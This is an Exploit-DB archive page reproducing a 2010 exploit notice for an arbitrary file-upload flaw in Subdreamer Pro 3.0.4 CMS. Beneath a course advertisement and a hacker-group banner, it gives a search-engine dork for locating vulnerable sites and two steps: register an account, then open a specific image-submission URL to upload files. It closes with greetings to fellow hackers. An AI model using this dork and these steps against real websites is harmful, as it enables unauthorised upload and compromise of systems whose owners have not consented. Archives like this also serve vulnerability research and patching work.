Subdreamer Pro 3.0.4 - CMS Upload

EDB-ID:

14101

CVE:

N/A




Platform:

Multiple

Date:

2010-06-28


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

__________         __    __                              .__ 
\\\\______   \\\\_____ _/  |__/  |_  ____  __ __  ___________  |__|
 |    |  _/\\\\__  \\\\\\\\   __\\\\   __\\\\/  _ \\\\|  |  \\\\/  ___/\\\\__  \\\\ |  |
 |    |   \\\\ / __ \\\\|  |  |  | (  <_> )  |  /\\\\___ \\\\  / __ \\\\|  |
 |______  /(____  /__|  |__|  \\\\____/|____//____  >(____  /__|
        \\\\/      \\\\/                             \\\\/      \\\\/   

######################################################
# Exploit Title: Subdreamer Pro v3.0.4 CMS upload Vulnerability
# Author: Battousai
# Home: http://hack.pro.mk & https://ssteam.ws
# Software Link:N/A
# Version: v3.0.4
# Tested on: Windows XP SP3, Linux Ubuntu 10.04
# CVE : N/A
#Dork: \\\"Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media\\\"
######################################################


Exploit:

1. Register your account at: http://127.0.0.1/index.php?categoryid=4

2. After registring point your browser at: http://127.0.0.1/index.php?categoryid=2&p17_sectionid=2&p17_action=submitimage (and upload is complete)



######################################################
# Greetz to: SilenceD, Zer0Flag, Evilb4st4rd, internet
# KingPin, s3th, packetdeath, Horadrim, AnnexxEmpire
# sM10, 599eme Man, Xylitol, __KiNG, 777, sp1r1t
# d3v1l, AlphaDog, n3d
# and every living person at:
# http://hack.pro.mk & https://ssteam.ws
######################################################